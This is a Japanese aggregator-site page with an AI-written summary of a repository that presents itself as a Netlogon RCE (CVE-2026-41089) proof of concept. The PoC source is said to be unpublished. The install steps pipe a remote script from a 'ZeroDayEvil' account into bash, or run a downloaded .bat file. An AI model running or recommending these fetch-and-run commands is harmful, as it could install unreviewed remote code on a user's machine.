SyntaxMethod/CVE-2026-41089-Netlogon-RCE-PoC

Netlogon RCE(CVE-2026-41089)の攻撃サーフェスを検証するセキュリティリサーチ用リポジトリです。

インストール型ツール自由に使える · MITセキュリティ難易度
93+0今週0
0フォーク0Issue
デモ・公式サイトをひらくzerodayevil.github.io

中辛 の解説

本リポジトリはCVE-2026-41089(Netlogon RCE)の制御された検証を目的としており、AI Security Toolのモジュールエコシステムに統合されています。AI Security Tool本体はSSH・RDP・VNCなどのマルチプロトコル接続、CVEインテリジェンス分析、12種以上のAIエージェントを搭載したクロスプラットフォームのセキュリティ監査ツールです。Linux・macOS・Windows・Androidに対応したビルドが提供されており、ワンライナーインストールスクリプトですぐに起動できます。ただし本PoC自体の実行環境はソースコードが公開されておらず、モジュールポータル経由での提供となっています。

こんなリポジトリです

こんなときに便利です

  • 許可を得たラボ環境でNetlogonの攻撃サーフェスを検証したいセキュリティ研究者
  • Red TeamやCTFのシナリオでAIエージェントによる自動化を活用したいペネトレーションテスター
  • CVEインテリジェンスとSBOM解析を一元化したセキュリティ監査ツールを探しているチーム

主な機能

CVE-2026-41089 Netlogon RCEの制御された検証モジュール12種以上のAIエージェントによるセキュリティ監査の自動化SSH・RDP・VNCなどマルチプロトコル対応の統合ターミナル

ほかとの違い

LLM(DeepSeek・OpenAIなど)との統合により、コマンド自動補完・スクリプト生成・脆弱性連鎖分析を単一プラットフォームで実行できる点が、既存の個別ツール群と異なります。

食べた人たち

実際に使ってみた人の記録です — 一言も完走の記録も、確認のうえで公開しています。

試食評 · 使った人のひとこと

まだ試食評がありません。使ってみたら、最初のひとことをどうぞ。

ほかのリポジトリの試食評を見る →

このリポジトリで作られたもの

🖋 完走を記録する

まだ完走の記録がありません。最初の一膳を記録してみませんか。

このリポジトリの作り方

はじめてですか? むずかしくありません — 上から順にたどれば、自分の環境で動かして味見できます。

準備するもの

  • Node.js(ソースビルドの場合)
  • npm
  • 許可を得た隔離されたラボ環境

すぐに始める

  1. Linux/macOS の場合、ワンライナーでインストールします。
curl -o- https://raw.githubusercontent.com/ZeroDayEvil/ai-security-tool/main/scripts/one-line-web.sh | bash
  1. Windows(PowerShell)の場合は以下を実行します。
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/ZeroDayEvil/ai-security-tool/main/scripts/one-line-web.bat" -OutFile "one-line-web.bat"
cmd.exe /c ".\one-line-web.bat"
  1. ソースからビルドする場合は、リポジトリをクローンして依存関係をインストールします。
git clone https://github.com/ZeroDayEvil/ai-security-tool.git
cd ai-security-tool
npm install
npm run build
  1. プロダクションモードで起動します。
npm run prod
  1. サーバー公開時は .env ファイルを設定します。
ENABLE_AUTH=1
DISABLE_LOCAL_TERMINAL=1
SERVER_SECRET=your_server_secret_key
SERVER_PASS=your_strong_password
  1. 起動後、ブラウザで以下のURLにアクセスします。
http://127.0.0.1:5577

ギット飯トライで味見

入れるのが面倒で少し不安だったなら — 安全スキャンからインストールまで、ターミナル一行で終わります。

ターミナルに貼り付ければ、ギット飯の安全スキャン → 隔離フォルダへ clone → インストール → 実行方法の案内まで自動です。はじめてでも大丈夫 — この一行だけです。

npx gitbap-try SyntaxMethod/CVE-2026-41089-Netlogon-RCE-PoC

Node.js さえあれば、インストールなしで動きます · ギット飯トライとは? →

スター推移 · 7日

93+0 / 7日

使いやすさ · まねしやすいか

サンプル評点 34/100
  • ゆるいライセンス
  • テストあり
  • サンプル集
  • 最近の更新
  • AGENTS.md
  • llms.txt
  • テンプレート

最近の更新あり · 2026 年に作成

「セキュリティ」 こういうリポジトリを毎週受け取りませんか?

毎週月曜の朝、選んだ一膳だけ。広告なし · いつでも解除。

自分のリポジトリですか? README にギット飯バッジを貼る
[![깃밥](https://www.gitbap.com/badge/SyntaxMethod/CVE-2026-41089-Netlogon-RCE-PoC.svg)](https://www.gitbap.com/r/SyntaxMethod/CVE-2026-41089-Netlogon-RCE-PoC)
Claude からそのまま使う — ギット飯のつなぎ方

ギット飯を Claude につなぐと、こうしたリポジトリを Claude・Cursor・Codex から直接さがして試せます。

方法 ① コネクタ URL

Claude の設定 → コネクタにこのアドレスを貼り付け。

https://www.gitbap.com/api/mcp
方法 ② プラグイン(試用まで)

プラグインを入れると /gitbap-trending·/gitbap-try のスラッシュコマンドで、その場でリポジトリを試せます。Claude Code で下の 2 行を順に実行してください。

/plugin marketplace add jakeparkcolde/gitbap-cowork
/plugin install gitbap-cowork@gitbap
つなぎ方をくわしく →

AI が README をもとに要約しました · 原文を見る